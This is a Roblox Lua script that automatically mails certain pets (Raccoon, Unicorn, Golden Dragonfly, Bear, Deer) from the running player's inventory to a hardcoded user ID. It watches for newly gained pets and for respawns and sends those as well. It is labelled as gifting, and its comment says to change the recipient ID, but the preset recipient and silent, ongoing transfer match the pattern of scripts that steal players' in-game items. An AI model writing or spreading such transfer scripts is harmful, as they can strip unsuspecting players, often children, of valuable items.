--// AUTO GIFT RACCOON & UNICORN

local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")

local LocalPlayer = Players.LocalPlayer
local Backpack = LocalPlayer:WaitForChild("Backpack")

local Networking = require(ReplicatedStorage.SharedModules.Networking)

--------------------------------------------------
-- CONFIG
--------------------------------------------------

local TARGET_USER_ID = 8139051826 -- GANTI USERID TUJUAN
local NOTE = "Gift"

local TARGET_PETS = {
    ["Raccoon"] = true,
    ["Unicorn"] = true,
    ["GoldenDragonfly"] = true,
    ["Golden Dragonfly"] = true,
    ["Bear"] = true,
    ["Deer"] = true,
    
}

--------------------------------------------------
-- CACHE
--------------------------------------------------

local SentPetIds = {}

--------------------------------------------------
-- WAIT BACKPACK LOAD
--------------------------------------------------

local function WaitBackpackLoaded()
    print("[AutoGift] Waiting Backpack...")

    repeat
        task.wait(0.5)
    until #Backpack:GetChildren() > 0

    print("[AutoGift] Backpack Loaded!")
end

--------------------------------------------------
-- UNEQUIP
--------------------------------------------------

local function UnequipTargetPets()

    local Character = LocalPlayer.Character or LocalPlayer.CharacterAdded:Wait()

    local Humanoid = Character:FindFirstChildOfClass("Humanoid")

    if Humanoid then
        Humanoid:UnequipTools()
    end

    task.wait(0.5)

    for _, tool in ipairs(Character:GetChildren()) do
        if tool:IsA("Tool") and TARGET_PETS[tool.Name] then
            tool.Parent = Backpack
        end
    end
end

--------------------------------------------------
-- SEND
--------------------------------------------------

local function SendPet(tool)

    if not tool then
        return
    end

    if not tool:IsA("Tool") then
        return
    end

    if not TARGET_PETS[tool.Name] then
        return
    end

    local petId = tool:GetAttribute("PetId")

    if not petId then
        warn("PetId Missing :", tool.Name)
        return
    end

    if SentPetIds[petId] then
        return
    end

    SentPetIds[petId] = true

    print("Sending :", tool.Name, petId)

    local success, result = pcall(function()

        return Networking.Mailbox.SendBatch:Fire(

            TARGET_USER_ID,

            {
                {
                    Category = "Pets",
                    ItemKey = petId,
                    Count = 1
                }
            },

            NOTE

        )

    end)

    print(success, result)

    if not success then
        SentPetIds[petId] = nil
    end

end

--------------------------------------------------
-- SCAN
--------------------------------------------------

local function Scan()

    UnequipTargetPets()

    task.wait(0.5)

    for _, tool in ipairs(Backpack:GetChildren()) do
        SendPet(tool)
    end

end

--------------------------------------------------
-- START
--------------------------------------------------

task.spawn(function()

    -- Tunggu Backpack benar-benar ada isinya
    WaitBackpackLoaded()

    -- Scan pertama
    Scan()

    -- Monitor pet baru
    Backpack.ChildAdded:Connect(function(tool)

        task.wait(0.5)

        UnequipTargetPets()

        task.wait(0.3)

        SendPet(tool)

    end)

end)

--------------------------------------------------
-- RESPAWN
--------------------------------------------------

LocalPlayer.CharacterAdded:Connect(function()

    task.wait(2)

    WaitBackpackLoaded()

    Scan()

end)
